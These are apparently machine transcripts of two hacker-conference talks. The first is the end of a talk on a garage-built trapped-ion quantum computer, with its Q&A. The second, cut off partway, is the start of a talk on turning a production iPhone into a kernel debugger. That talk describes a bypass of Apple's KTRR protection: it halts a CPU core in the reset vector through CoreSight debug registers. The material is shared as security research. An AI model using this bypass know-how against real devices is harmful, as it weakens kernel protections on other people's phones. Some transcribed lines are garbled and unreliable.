the NASA, because NASA sent electronic in space. Space is like a big vacuum chamber. So they have a list of materials publicly available to be able to use some materials that are compatible with space conditions. They are professional. So what are the material candidates for my ion trap? I need to use some gold for electronic conductor. I need to use ceramic for mechanical supports and captain cable for wiring inside the vacuum chamber. So Maker is really a hard job, because I need to find an idea to transform my 3D printer or linear ion trap to something that is compatible with ultra high vacuum environments. So I need to read the manual. There is a lot of literature on quantum computer, on Google, on Internet. So I have a bunch of books about quantum mechanics, and this which has paper are full of detail. I found this. Some guys succeed to transform a linear pole trap with road to a planar ion trap with planar or surfacing electrode. That's cool. So I need to transform this to that. Oh boy, I need to make my own chip. Price for complex chip factories are around 200 million of dollars. I call Intel. They don't want to sell me one. And it's a bit out of my budget scope. A bit. I think five minutes to find a solution, in fact, it takes me two months to find an affordable solution to do that. So I want to make a new design like a boss of ion trap. I use a CNC, a $300 CNC, come from Amazon. I found an empty ceramic chip carrier on eBay from a Norwegian guy, and I designed a simple key card PCB. So I use this. This is the ceramic chip supports. And what you see in yellow, it's gold. I designed a key card, this PCB. And this time, we apply electric field, I voltage electric field to this electrode, this one and those one. And it creates an electric field to align all the macro particles or the ion in this line. And this is how I made my computer chip. Thank you. And the better is that it works. So I have my first computer done on my garage. And just keep calm and accept my boss. And it's not just a slide where, because if you want to see one of my prototypes, I bring it so you can touch it and see how it works. But when you design such complex things, I'm not a physicist, I'm just an engineer, a crazy one. But how to be sure that I'm on the right road. I went to the Science Museum in London a few months ago and there's this exhibition from our friend of GTSQ. Do you know what GTSQ is? It's like the NSR for the UK. And they made an exhibition about cryptography. And in this museum, they present a quantum computer based on ion trap technology. Thanks. This is the experimental part they show in this museum about quantum computer. In the right corner of this exhibition, there is a wafer. On the wafer, you have the electric design down to make their own ion trap. This is the design of the GTSQ. This is mine. I think I'm on the right road. Of course, I need to build my own vacuum chamber. It's not the difficult part. The vacuum chamber is just metal. You need some nuts, bolts, tin metal and pumps, a lot of pumps to suck out all the air in the vacuum. So I bought off eBay a different type of pumps. I like my vacuum chamber. This one, pretty one. And I put the ion trap inside the vacuum chamber. And for now, I'm working on the laser and optical setup. And this is the main difficult part for this quantum computer. Because we fancy numerous wavelengths for laser, and we need to have a very precise wavelength to be able to manage the energy level of the atom to make some calculation. So of course, I could have an IAF. I have asked some professionals of these devices to send me some proposal. A laser costs around 25 kiloeuros, at least, for this type of instrumentation. Or you can do it yourself from 2 kiloeuros. So I decided to make my own laser setup. I'm not a laser optical or laser specialist. The first time I play with laser. And everything is on the web. You can learn everything with the web. And I found this type of schematic. You just have a laser diode, some fancy optical lens, a grating mirror that let you choose or mainly choose what the reference frequency you want to use it. There is a sort of loop control with a PID control, which is for an electronic like me, a normal thing to do. I don't know why all those fancy commercial products cost a lot. I don't know yet. Perhaps I will have some failure in the future. But I don't know. So I asked a guy on the internet that sold me a laser in kits. You can buy and mount your own laser. And this laser is controlled by an Arduino. So you have fancy mirror, the HENE, Helium-Neon laser tube. And you can make your own laser at home also. I need a bunch of optical amounts and supports to support the lens, the mirror, etc. And as I bought a 3D printer for my iron trap that I cannot use anymore because I use a vacuum chamber, I used the 3D printer to make all the optical amounts, in fact. So it saved me my money again. However, you need to know that it's still a long road to have a complete consumer computer because I need to set up all these fancy optical and laser. This is my job at the moment. Nearly I have six months to one year of work. But the good news is that at the software level, everything exists. If you need to have a compiler to make your code, it exists at the moment. It's open source. If you need to have some framework to make some pulse and laser control, it exists. And it is open source. So I'm trying to convince you, let me know if you agree with me, that doing a quantum computer at home, it's doable. I agree. But we are at the CCC. How to hack into a quantum computer? This is the fun part. It's easy. Just do what we do when we are an infrasight guy. Do the same things we do as usual. Hack the weakest list. You must know that when you build a quantum computer, there is few things that behave in the quantum mechanical regime. You just only need this chip, for example, and some laser. But all the equipment surrounded the quantum parts of the quantum computer is classical system. This is wave generator, classical computer, some IOTs, some problem, industrial systems. Sometimes they have IP address. So the main avenue to hack into a quantum computer is to act the surrounding classical embedded system. So small company that is the competitor of me, it's a startup called IBM. They use superconductive technology to build their own quantum computer. The processor is just behind this delusion of refrigerator because they need to cool down their processor to be able to use the superconducting capability. Mine work at room temperature. And surrounded this processor, the researcher explained, this is a very good video to understand how it works. Surrounded this quantum part of their quantum computer, you have a bunch of instruments. And if you zoom in, you see. If you zoom in this wave generator, it's a wave generator to send pulse to the superconducting processor, there is a sticker. And this sticker, in fact. So of course for security reasons, I make some X to not show the complete password. So as a conclusion, I'm trying to convince you that's quantum computing and quantum computer advice doable at home. So for cybersecurity, also called cybersecurity specialist. You need to adapt your own risk analysis because it's doable at home. Just understand that. It's doable at home. They will, all this quantum computer will be used for good, bad and ugly. Just remember GTSQ as a prototype in a museum. I would, it would have fun if I could have seen the production quantum computer of the GTSQ. Of course, quantum computer is a capable art. It has an abnormal computer. So it's a good news for the cybersecurity industry. But you need, as a community, as an off maker in CCC, we need to be prepared to learn and how to use them, how to act them, how to program them. And at the software level, just you need to unlock your classical brain, the classical software brain. Because if you, if I want to mention something at the software level, if you want to do some quantum codes, you need to be able to use your code without any variables. You can't use variables in quantum codes. Because if you use variables, you make a copy of a quantum state, making a copy of a quantum state, it's impossible. So you can't use them to make a variable or use a variable in your program. And you can't debug it. Because if you debug it, you make a measurement. If you make a measurement, you destroy the quantum, the quantum state. So be prepared to unlock your brain to be able to make some code in the quantum world. But it's fun, sometimes. Thanks for your attention. And if you have any questions, it will be a pleasure. And as I'm French, I need to have a two-hour lunch time. Fondastique, merci beaucoup. We have a lot of time now for questions and answers. Line up at the microphones, please. And let's have a look if there's something from the Internet. Yes. I'm sorry. So please, first one from the Internet. For reason, Internet. All right. The Internet's quite impressed by your talk. So that's just a statement. Everyone's very happy and pleased with your talk. Thanks to the Internet. All right. You have a few questions. The first one is, what properties should the element be chosen for the ion trap? What? Sorry? So what are the properties that should be looked at for choosing the element for the ion trap? What's atom? I think the person asked, what's atom? I used the atom from calcium. Those atoms have a specific, because there is a lot of literature available. So it's easy for me to understand how it works. Researchers have done all the work before. And I used the atom because there are some energy levels in this atom that is better protected from the environment. Okay, let's quickly switch to microphone number three. Thank you for your talk. My question is, what's the catch? If your design already exists in prototypes out there, and it seems so much easier than working with superconductors, then why isn't everyone already doing this? Why someone choose superconducting and not ion trap technology? Is that your question? Correct. I don't know. Every time, there is this type of question. Why the big one used superconducting technology and why are you using ion trap technology? Mainly the answer could be that the big one is from the microelectronic domain. So a superconducting qubit is done on a wafer. So it's usual for this type of company to be able to build this type of qubits. I think it's just an habit. Okay, thank you. Okay, microphone number two, please. I'm very impressed, but okay, you mentioned that hobbyists can't really afford this, a small company can. So just as a ballpark figure, I would like to ask the question, nice, how much? All I have show you here, it cost only less than 15 kilo of euro of material for the moment. It is not for a beast, for small company. Okay, one question from the internet, signal range, please. All right, the next question is, is your next step going to be singling out individual ions? Sorry? Can you repeat? Would your next step be singling out individual ions for your next step in your quantum computer? We try to manipulate single ions, but in fact, it's the goal with laser. With laser, you shine a laser of individual qubits. And with another laser, you make a link between the ions with the common motion of the ion chain. And you change the state of an individual ions. You transfer the state of this individual ions to the chain, which move because ions are electric charge. So they repulse each other. And this act as a bus. And you transfer the quantum state information to a second ion to make a logic. So the goal, effectively, is to be able to manipulate one ions. We just, we shine a laser on the individual atoms. This is the goal. Okay, microphone number four, please. Google announced recently that they achieved the quantum supremacy. What is your opinion in this theme? They've done a very good job for that. I think they create, they show to the world for the first time that a quantum computer is able to do a calculation that a classical computer will never be able to do in a classical world. However, is that calculation useful? I'm not sure. Except for one thing, it's able to certify the randomness of a number. And it could be useful for the cybersecurity world. So it's, I think, and from my company, I have no money to spend to marketing thanks to Google. Because they show the world the power of quantum computer. So it's cool for me. Okay, microphone number two, please. Hello. Thanks for the nice talk. I'm a material scientist from offline Gießen. Maybe you heard about our incident here. I was asking, what are your current problems with this? For example, I mean, I think I have too many questions to ask here now. But for example, we saw that you had some like little pellets that were floating over your structure, but these are not the atoms that you're trying to confine with each other. So you can make calculations. So you didn't tell anything about how you are trying to achieve this. And what is your current state? I mean, could you even start some crude calculations on this already? No, not for the moment, because I need to shine the laser in the right direction. So for the moment, I'm building the optical setup. Okay, all right. Maybe there are some possibilities how I could help you with your project. You're welcome. Because I have access. If I could ask the right people, I'm not in the position to promise something to you now. But for example, we have a nanoscripe laser system with this like a 3D printer, but you can build things on nanomemeterscale. Which is the cost of to use it. The cost of the printer is around 300,000 euro. Oh. I take it. All right. Thanks for your help. Maybe after the talk, you can get in contact. Oh, yes. Okay. We have a dinner. Okay. All right. So two new friends, actually. Question from the internet, please. All right. So how many qubits is it possible to make in the garage? For the prototype, we think we are able to do some 10 to 15 qubits with one iron trap. The goal is to change the iron trap. So we have many, not as many as we want, but we could rise the number of qubits to 100 qubits. Okay. Microphone number three, please. Which calculations do you plan to perform on your quantum computer? I don't care. I build things. And software guy do their code. He's not my job. Okay. Microphone number four, please. There is somebody. Hello. So your optical setup reminded me of atomic force microscopes. Are you aware of what they are? Perhaps. They are essentially an optical setup with a nano-microscale tip at the edge that rasters that scans across the surface and can detect nanoscale features. But the cool thing is that even though this is a scientific instrument, there is also open hardware designs for that. And maybe you can see the ideas from that for your optical setup. Because once again, you've got precise lasers, at least on the geometrical side. They have to be precisely aligned and everything. Thanks for the information. And of course, we use a lot of spectrography techniques in this type of computer. Okay. Do you have somebody over there at microphone number three? Did you consider optical quantum computers with entangled photons and such stuff? This was my first choice, in fact. However, as far as I know, I'm not a physicist. It's difficult to make some entanglements, not entanglements. It's difficult to make some photons to talk to each other, they say that. So it's a complicated way to do something with multiple qubits. But photonics is a good technology because it works also at room temperature. But I prefer to have a vacuum chamber in my garage. Okay. Let's interrogate the Internet again. So you mentioned that you should not be doing measurements on the quantum computer. So have you tried doing any measurements on your prototype? Measurement of what? This is hard. I think the Internet cannot really reply now. So can we? Internet is limited. I think we cannot really respond to that. If the guy that asked the question wants to send me the question, I can answer just after. Right. I heard it's talking about electric field. I know. I just, I don't make any measurements. I'm an engineer and as I'm a good engineer, I just plug things and just saw what happens. I have no idea of the electric field generated. No idea. Okay. Microphone number two, please. Hello. Thank you for the talk. So after you generate the vacuum in your vacuum chamber, how do you actually introduce the right number of ions and how do you keep them in the place where you need to have them? It's a good question. In fact, we don't introduce the ions. We put a calcium stone, sort of calcium stone, in a sort of oven. It's just a tube. We send current in this tube. This tube eats the calcium. They make some vapor and we shine a laser on the vapor of a natural atom of calcium and this creates the ions. And this ion is trapped because it's now electric charged by the electrostatic field we make with the ion trap. So we just introduced before closing all the vacuum viewport and all the nuts and bolts, we just put a piece of stone of calcium, natural atom. So everything is in the chamber before we turn on the quantum computer or the chamber. Okay, we stay at microphone number two. There is another one. Okay, second question. What you're describing is you have a linear array of, right now, macroscopic particles. You will have a linear array of ions that are then coupled by kind of common vibrational modes so they need to see each other's electrical fields. So I am wondering what the characteristic length scale between macroscopic particles versus ions would be if you want to have some meaningful vibrational modes that don't immediately get drowned in external thermal noise. So if I understand correctly the question, you ask me what is the dimension between the ions? Yes, I mean you are pretty big compared to the IBM guys. If yes, I'm big. Yes, thank you. You're right. The main dimension we use between ions is few micron. And if some researcher succeeds to align 100 ions, so you have a chain of 100 ions multiplied by 5 to 10 micron between ions. This is the length. But I mean on your substrate you have a fraction of a millimeter between the... It's because it's prototype. Okay. You're right. I need to squeeze the design a little bit. I just need to buy a better CNC machine. Okay, we got some question from the internet again. All right, go. So this one is... This is more towards knowing about the GC HQ exhibition. Is it still open? Do you know? Yes, I think. I have a free ticket if you want. It's free. In fact, it's free. I guess people will contact you and Twitter for that. Yeah, make some tourist business or something. I can help. Everyone was impressed with your GC HQ hat. Okay, any more questions? How many people are working in your garage? There is me and sometimes one of my daughter, which is 10 years old. Pro team? Yeah, a big one. Okay, any more questions from the audience, from the internet? We have time. Okay, I'm going to close the session now. Thank you very much. Big applause again for Jan. And MP Project Biden was invited to the show for an выс denenfe You
Quantum technologies are often only over-hyped showed as threat for cybersecurity … But they also offer some opportunities to enhance the cybersecurity landscape . As an example, you may know that a quantum computer will be able to break RSA keys but Quantum communication technologies can also provide a new way to exchange securely a cipher key. More, with Quantum networking technologies, communication eavesdropping are , by design, detectable and thus this could lead to some good opportunities to use them to enhance cybersecurity. Some even begins to build a Quantum internet ! We may also solve main security issues face by cloud computation (privacy, confidentiality etc) via the use of "Blind quantum computation" in the cloud. However few people understand & explain how such machines & technologies work. Even fewer people trying to build one. I’m one of this crazy people. In this talk, we aim to explain how this new type of much powerful digital processing works and how we build our own Quantum computer …without a Phd in quantum physic. We will describe our plan to build the Quantum computer's hardware with hacker’s style. Through our own experiments, we will discuss our failures, our success, our progress around this challenging goal ! Come to see part of the hardware we build at the moment. We use the "Trapped ion technology". We trap atoms to make powerful calculation & computing task! Be prepared to unlock your quantum brain as this new domain is really different for classical computation ;-) but it can enhance the Cybersecurity world Our goal : Bring the knowledge that Quantum computing works, explain how they make such power calculation at hardware level, is doable at home and will provide a new way to do secure computing and communication for the best of the humanity Proposal Agenda -Quantum computer 101 (one slide to be able to understand the basic of quantum mechanic w/o FUD) -Why those Quantum computer are so powerful -How to break things with quantum computers -How to improve the security level of modern network with quantum technologies (Networking, blind quantum computing for 100%privacy in the cloud, cipher key security, quantum internet & more) -How a Quantum computer based on Trapped ions technology works to do their magic super powerful calculation (at hardware level) -How we build our own quantum computer hardware at home (in our military grade High Tech...Garage!) with hacker style & open source software (Contain full video of the buildings of our Quantum computer)
10.5446/53157 (DOI)
So, the next talk is called KTRW, the journey to build a debuggable iPhone. Hardware debugging of an iPhone is usually not possible. It's not possible with iOS devices or it wasn't possible with iOS devices. And security research of the kernel is therefore quite a challenge. Well, with the Apple A10 chip, Apple implemented a thing called kernel text read only regions, which is called KTRR in short. And Brandon Asad of Google Project Zero, he found a way to make a debuggable iPhone. And tonight he's going to tell us how he broke this KTRR and how he made a debuggable iPhone out of a regular production iPhone. Please give a warm round of applause to Brandon. Thanks. Awesome. Thank you very much. I'm very excited to be here. Thank you for showing up to my talk. And today I'm going to take you along my journey to build a capability that I've wanted to have for a very long time, a debuggable iPhone. So what exactly do I mean by a debuggable iPhone? Well, in order to kind of give you the context that you need to understand this, I'm going to need to talk about something which isn't frequently talked about in public. And it's a thing called dev fused devices, development fused devices, prototype iPhones. These are all names for similar concept, which is a type of device, a type of iPhone that has extra debugg capabilities built into it. So that's things like serial wire debug, JTAG, basically functionality that now allows you to debug the phone at a very low level. For example, doing things like single stepping through the bootloader, putting breakpoints in kernel mode and dumping registers, modifying registers, sorts of things which would be very important for Apple engineers to be able to do, which are definitely not something Apple wants available on production iPhones distributed en masse. Now, in order to connect to these special type of iPhones, debug capabilities, you need a really special type of cable, usually called a probe. Here's an example of what's called a conzi cable. It has a special lightning connector on one end, which has a special accessory ID burned into it, which allows it to communicate with the debug hardware on the phone. It has a controller, which is the chunky part in the middle, which is able to talk the debugging protocol, and it has a USB port on the other end, which you can connect to a laptop. On the laptop, you would typically run software. For example, there's this tool which you can find online called Astris. This is not software which Apple is willingly distributing. This is kind of, as I understand it, leaked code, so it's not something which is, like, you know, sanctioned. But there are people who are able to obtain this software and use it to operate these debug probes. Here's an example of a screenshot where someone was able to use a Kong serial wire debug probe and connect it to a 32-bit dev-used iPhone. And you can see register dumps. You can read and write memory. You can do all sorts of really low-level debugging on this iPhone. Now, I need to say I do not use dev-used devices. I don't have access to these devices. I don't want to have access to these devices to do my work. That being said, it would really be incredibly useful to have such a low-level and powerful debug capability. So this is the motivation for my research project. I wanted to find some way to build a debug capability on a regular Apple-certified iPhone. Some way to build my own homebrewed dev phone. And there were a number of different features that I wanted present in this homebrewed dev phone. I wanted the ability to patch kernel memory, and in particular the ability to patch the executable code in the kernel. For example, modifying existing instructions or injecting kernel shell code, things like that. I wanted the ability to kind of do your standard debugger features, set breakpoints, set watchpoints. The third item that I wanted this debug phone to be capable of is I wanted it to use only standard off-the-shelf debuggers. I didn't want to use or to depend upon proprietary Apple software like Astrus in order to operate. The next item is I wanted this homebrewed dev phone to be updateable. So I wanted to find some sort of low-level vulnerability such that if I'm going to spend three months trying to create this debugable phone, and then Apple is able to patch whatever technique was being used in the next version of iOS, and now all of a sudden I no longer am able to debug the latest version, certainly this would be very useful. I can always diff the differences between subsequent versions of iOS to still get useful information from my debugger, but I would really love to be able to amortize the development cost of this debugger over many iterations of the iOS operating system, so keep this capability alive as long as possible. In practice, what this meant was I was going to be looking for perhaps a bootloader vulnerability, maybe some sort of hardware bug, something which was either difficult to patch, or even if it was patched, it was early enough in the boot process that it would still be possible to update the version of the iOS kernel running on the device. And the final thing is I wanted this dev phone to use only parts that you could obtain at an Apple store. So no specially fused CPUs, no special debug cables, nothing of that sort. Now I want to mention something really, really important that happened, probably the most important thing to happen to iOS security research in several years. And that is pretty much just a couple of days before I was about to open source KTRW. Axiom X released a boot ROM exploit for all iPhones between the iPhone 4S and the iPhone 10. Now the boot ROM exploit is actually strictly more powerful than the capability used in KTRW. Everything that I want to do in my debug phone is totally possible to do using the boot ROM exploit alone. So I want to tell you this just so that you're aware that many of the assumptions that I made going into this project really don't hold anymore. But they did hold at the time that I started this research. And I do expect that future debug capabilities and future research platforms on the iPhone will be based around the boot ROM exploit instead. So with that, let's talk about the main mitigation that makes kernel debugging on iPhone right now both really hard to do and also so important. And that's a mitigation called KTRR. If we look back at the list of requirements that I wanted in my homebrew dev phone, the very first item on this list was I wanted the ability to patch kernel memory, and in particular to patch the executable code. Now normally on most systems, this isn't actually that difficult. Once you have the ability to read and write kernel memory, you can just modify page tables, make some page in memory, read write execute, stuff your shellcode in there, and you're basically done. But on the iPhone, Apple has added a mitigation called KTRW. And the idea is that we have a kernel caching memory that's been put there by some sort of secure boot process. But once it's in memory and the system is running, Apple would really like a way to guarantee that the kernel cache gets locked down as much as possible. And any data in it which really does not need to be writable is never going to be modified. Basically keep the guarantee that once an iPhone is booted, the code running in your kernel is exactly the code that was protected by and verified by the secure boot process. So there is some data in your kernel which does need to be writable. But there's also a bunch of data which really does not need to be writable. The most prominent example is the executable code. Clearly we don't want that to be changeable. But there's also a bunch of other pieces of data which are worth protecting. For example, you have strings, maybe format strings, virtual method tables, the page tables that are mapping the kernel cache itself into memory. All of these additional pieces of data, Apple would really like to have them be protected and not modifiable. And that's what KTRR does. It's going to lock down all of this data that we want to be read-only as the defenders. So as far as we know, KTRR stands for Kernel Text Read-Only Region. So what KTRR boils down to is it's a very strong form of write, XOR, execute protection. It's available in Apple A10 CPUs and later, and it provides two very strong guarantees. First is that all writes to memory inside of the region protected by KTRR will fail. This basically is what provides kind of the lock down guarantee that what was put there by the secure bootchain kind of stays that way and can't be changed. But there's another part to it which is equally important. And that is that all instruction fetches from memory outside of the protected region are guaranteed to fail. This is what ensures that you can't put new executable code in the kernel, but the only code that you're allowed to run is the kernel's own code. So in order to kind of understand how this works in a little more detail, let's look at an oversimplified diagram of how CPU works. So here we have the CPU cores. This is, for example, an A11 CPU with six cores. The little purple box in the bottom corner is the MMU. We have the highest level of the cache hierarchy, is the L2 cache. Behind that is the memory controller called AMCC. And then this is connected to DRAM. Now the kernel lives contiguously in physical memory in DRAM. And this is what Apple wants to protect with KTRR. So the first step in order to lock down this region happens on the MMU. So let's zoom in to a single CPU core. What Apple has done, as far as I understand, is basically just add a couple of registers to the MMU that point to the beginning and ending address of the region to protect. What this allows us to do is the CPU core can now check whether each instruction it's about to execute violates the security guarantees we want from KTRR. So for example, let's say the CPU wants to show a right to a physical address outside of the KTRR region. That's fine. We can write to that memory. So this will be allowed by the MMU and the right will go through. If, however, we try to issue a right to an address that points to inside the KTRR region, this violates the security properties of KTRR. And so the MMU will recognize this, it'll deny the right, and it'll cause that instruction to fault. Similarly, if the CPU tries to execute an instruction that is fetched from an address outside of the KTRR region, the MMU can recognize this and cause that instruction fetch to fault. So here's kind of the new picture of the CPU cores. We have a bunch of new registers in the MMU that kind of have this KTRR protection built into them. However, this isn't the complete picture that we need in order to protect this memory. See, there are other devices that are connected to your system, all sorts of peripherals. This could be like a Wi-Fi chip, this could be like a USB stack, all sorts of things, any sort of hardware device which could issue DMA commands to your memory controller. So in order to protect against malicious peripherals, DMAing over the protected region, we think that Apple has added registers to the memory controller as well that also point to the beginning and ending address of this lockdown region, such that that way, any time some peripheral tries to DMA over the secure region, the memory controller sees that this DMA doesn't look valid and it will just discard the right. So this is kind of the picture that the hardware now looks like in order to support KTRR. But this isn't actually the complete story either because there's one specific edge case that needs to be properly handled, and that's when a CPU core goes to sleep for a little bit and then wakes up, what's called resetting. Any time a CPU core goes to sleep, it's going to power down registers and in particular the MMU registers which store the KTRR bounds are going to lose their value and be reset to zero. So when the CPU wakes up from sleep, we need some way to reset those registers to point to the beginning and ending bounds of the lockdown region. So the reset vector is the first piece of code that gets executed when a CPU core wakes from sleep, and it does so with the MMU off. And what Apple has done is they've added code to the reset vector that basically just initializes those KTRR registers. The beginning and ending bounds are stored in these global variables. These variables, by the way, happen to lie inside of the locked down region, so they can't be modified. And once it reads those values into general purpose registers, it writes those bounds into special system registers that are used by the MMU to verify the KTRR security properties. So once this code executes, KTRR will be locked down on the MMU, and once again you can no longer execute memory that lies outside of the locked down region. So now that we have kind of a high level understanding of how KTRR works, let's look at how it's possible to break KTRR. And we'll start with a few historical examples. There are two historical instances of partial KTRR bypasses up till now, and the first one came out pretty soon after the KTRR mitigation was first introduced, and it was discovered by Luca Tedesco, who's going to be giving a talk, I think, in this room tomorrow evening. So what Luca found was that Apple had left an instruction in the kernel cache that they didn't mean to leave executable, but it accidentally was. This was the MSR TTBR1 instruction, which sets the special TTBR1 register. This register stores the physical address of the root of the page table hierarchy, which means that if you're able to modify the value of this register, then you are able to supply your own custom page table hierarchy and therefore remap virtual memory onto new physical pages. So this is exactly what he did. He just chose a remapping that placed the read-only regions of kernel memory onto new physical pages that contained a copy of the original kernel data. Now, it's important to note that KTRR was still actually fully initialized at the point at which you were able to execute this MSR instruction. So we can patch read-only data, but we can't execute new kernel code because KTRR lockdown on the MMU still did occur. So what the KTRR bypass in 10.1 basically achieved was limiting what was protected by KTRR down from the whole read-only region to only the executable code. But we get a whole bunch of new data in the kernel, which is now writable. The second KTRR bypass that was released was more of a bypass in spirit than in practice, but definitely a very important tool and a huge inspiration for my research. So back in iOS 11.1.2, Ian Beer found that the debugging functionality in the ARM specification was actually implemented in Apple's processors and could be used to implement a full-featured kernel debugger. So if you read the ARM architecture reference manual, you'll find that there is documentation on a feature called self-hosted debugging. Basically, the architecture provides a set of debug registers, which you can access via MSR instructions, and you can use these debugging registers to set breakpoints in kernel mode and also to, by implementing exception handling code in your exception handler, you can catch your own breakpoint exceptions and basically have the kernel implement its own debugger. For example, this might be somewhat analogous to using a KDP to debug a MacBook. Now, KDP has actually been removed from the iOS kernel that's distributed on production devices. However, the debugging registers that one might use to implement this are still present, still fully functional. And what Ian found was that he could use return-oriented programming to set the values of these registers correctly in order to implement a rather full-featured kernel debugger. He built something that works with LLDB, proved quite useful, and in particular, it was able to, by setting breakpoints, single-stepping, modify register values, execute existing instructions in the kernel in basically arbitrary order. So not native, like, arbitrary shellcode execution, but pretty darn close. So I started this project of trying to find some sort of KTRR bypass by looking in kind of the places that I thought would be more powerful, find more powerful KTRR bypasses, more likely to lead to something that would be persistent across multiple versions of iOS. Where I started was looking in iBoot. I was trying to find some sort of iBoot bug in the image for parsing and verification functions. I didn't end up finding anything there. Next, I kind of read through several sections of the ARM architecture manual, saw some interesting things about, you know, maybe, you know, if you have weird malformed TLB entry, if you have weird malformed page table entries, you could do something weird with the TLB. That didn't really end up yielding anything useful. I played around a little bit with, you know, I kind of misunderstood how KTRR worked a little bit, and I thought, you know, maybe there's a way to corrupt the L2 cache and then bypass KTRR that way. That didn't end up really working either. So I kind of, you know, tried a bunch of things, none of them really panned out, and I put this research on the back burner for a while. And it was actually while I was doing something totally unrelated that I happened to generate a kernel panic which reignited my interest. So I was playing around with interrupts, and I had managed to get a CPU core stuck in an infinite loop with interrupts disabled in kernel mode. And I got a panic message which said, you know, panic, watchdog timer, timeout, CPU1 has failed to respond. So kind of the exact thing you would expect when a CPU isn't responding because it's stuck burning CPU cycles in an infinite loop, eventually system notices and panics because, you know, there's some significant problem here. But what really caught my attention about this panic message was something much earlier in it where it says attempting to forcibly halt CPU1. Now this was really interesting to me because according to what I'd read from the ARM manual, there wasn't any standard way for one CPU core to halt a second CPU. Like there's no MSRs that you can write to, I didn't really remember any way to accomplish this. So what I figured was there's probably some sort of like proprietary interface going on here where maybe there's special CPU control registers which are accessible via MMIO and somehow XNU is trying to leverage those in order to halt the CPU. So this seems like pretty interesting. I've never seen something like this before. So I decided to pull up the security engineering tools needed to figure out what was going on here. So I grepped through the XNU source code to try to find the string attempting to forcibly halt CPU. Pretty quickly came to the function mlDebugRapHaltCPU which seemed to implement this functionality. It takes the index of which CPU you want to halt. So on a CPU with six cores, it would be the index zero through five. And the actual part which halts the CPU is just right down here, a couple of lines lower. So what this does is it reads a pointer to some volatile memory from a per CPU data structure. This variable that stores the pointer to the memory is called debugRapReg. And then the actual part of the code which halts the CPU is simply consists of the single line where it writes some special debug halt value to the debugRapReg. So this really strongly supports the idea that this is some special MMIO register. And when I was looking online for trying to find references to this debugRap thing, I wasn't really getting any results. So it kind of really strongly suggested that yes, this is some sort of proprietary Apple specific interface. The other thing that kind of caught my attention was this reference to something called CoreSight. I remembered hearing CoreSight somewhere else before, but it didn't really know what it was, marked it as something to come back to. But what really caught my attention when I was looking through this file was a function just a few lines down called MLDebugRapHaltCPU with state. This does basically the same thing as the other function, except in addition to halting a CPU, it also reads out the values of the registers on that CPU that was just halted. And the way that it does this is actually quite remarkable. So first off, you can see that there is another reference to this CoreSight thing. It says, ensure memory mapped CoreSight registers can be written. So clearly something with CoreSight is important here. Maybe it's the block of registers that contain this functionality. But the important part is this for loop right below, which iterates I over the indices of your general purpose registers. What this code does is first it's going to generate the numerical opcode for the instruction, which writes the value of general purpose register xi into the special system register debug DTR. So this isn't an instruction which already exists in the kernel cache. It is just literally generating the numerical value of the opcode for that instruction. Next, it passes that opcode into MLDebugRapStuffInstruction. And finally, it reads the value of the debug DTR register and writes the value into the output buffer's xi field. So this is actually really interesting because what it suggests is that MLDebugRapStuffInstruction is somehow executing dynamically generated instructions. And this really flies in the face of the security model that KTR is designed for. So KTR is meant to ensure that all of the instructions in your kernel cache, those are the only ones that you're allowed to execute. But here, there's some sort of interface which seems to be able to execute any instruction you want on a halted CPU. So this is definitely really interesting. Now, just because there's code to do something in XNU doesn't actually mean that it necessarily works in practice. So I basically just decided to test to see if this code actually runs. I pulled up an old kernel exploit that I'd written and I basically just wrote and packed together something that would call the function MLDebugRapHaltCPU with state, pass it an output buffer, and then dump the contents of that buffer. And what I found was that the output buffer really did look like a bunch of registers. So there's a bunch of stuff which was zero, which was kind of weird, but the value of CPSR does look correct. It actually looks like a CPU running in kernel mode. And the value of PC, it doesn't really look like a normal kernel virtual address. Those usually start with like FFF. But it does really look like some sort of physical address, perhaps. And with a little bit of digging into this, I pretty quickly discovered that this is a physical address and instruction in the reset vector. Now things are really, really getting interesting because what this suggests is that we've managed to halt the execution of a CPU core while it's actually running the reset vector, and in particular before the MMU has been turned on. Now this is a really critical point in time for KTRR because before the MMU has been turned on, KTRR is unable to protect the CPU from executing instructions outside of the locked down region. So of course what I really wanted to know was how do we use this capability in order to bypass KTRR? Well it turns out that there's kind of a more fundamental question that I need to answer first, which was what exactly is this core site thing anyway? It's really hard in practice to, at least for me, to exploit something without kind of knowing a general sense of how something works. And so I basically just searched for core site in the ARM reference manual and came across a bunch of references to core site in connection with something called the external debug interface. Now the external debug interface, it turns out, is pretty much just a different way of accessing the same functionality that Ian used in his self-hosted kernel debugger. So in the self-hosted debugging interface, you write to these debug registers using MSR instructions. The external debug interface provides kind of a very similar functionality. It's probably the same debugging hardware under the hood that you're driving, but the interface to access these registers is via MMIO rather than via executing MSR instructions. So this means that basically the functionality that is necessary to build a kernel debugger is still there. Even though the BROC gadgets that Ian used to activate it are taken away, the memory mapped interface still exists. And in fact, this isn't even the first time, not even close to the first time, that someone has tried to use debugging registers in an ARM processor in order to mount some sort of privileged attack. Xin Yu Ning and Feng Wei Zhang presented an attack at Mosec 2019, where they basically were able to leverage these same debugging registers on Android phones to break the protection of the secure world. So they were able to make one CPU core debug another CPU core, make that second CPU core execute instructions to enter the secure world at EL3, and then also make it execute instructions that would cause it to read and write memory in the secure world. So just to summarize kind of the key concepts behind the external debug interface, it is an on-chip debugging architecture. It provides per-CPU debug registers, which are accessible via MMIO. The actual interface itself, how to use these registers is really extensively documented in the ARM manual. It talks about what the names of all the registers are, the offsets of them, how to program the registers in order to do things like set breakpoints and watchpoints. So I'm not going to go over all of that right here. But what I will say is that the external debug interface is certainly more than powerful enough to do any sort of kernel debugging that we might be interested in. So I'm definitely capable of setting breakpoints and watchpoints, single-stepping execution, executing arbitrary instructions, poking at memory, all this sort of stuff. So the idea for my attack was we have these debugging registers, we can do things like single-stepping, and we know that we can halt execution in the reset vector. So I basically decided I would try to use the external debug interface to single-step the reset vector, and then once the reset vector is about to execute the KTRR lockdown instructions, just jump over that piece of code so KTRR never gets initialized. So if we look at the reset vector, we'll just step through all of the first instructions, and then once we see that we've hit this conditional branch where we're just about to start doing the KTRR register initialization, we'll just set X17 to zero, jump over the KTRR code altogether. Now, this is a nice idea, but we don't actually have all the tools yet necessary in order to carry it out. We know that we can halt the CPU, and we know that we can execute arbitrary instructions on it and do things like modify the values and registers. But we haven't yet found the ability to resume executing on the CPU after it's been halted. So if we set a breakpoint on the reset vector, for example, that's nice, but it's not going to be of much use if we can't continue execution after that point. Furthermore, there's another somewhat more subtle issue, which is that we're using one CPU to hijack another CPU as it resets. But CPU resets happen all the time. Every time a CPU core is idle for a couple of seconds, it'll eventually just do 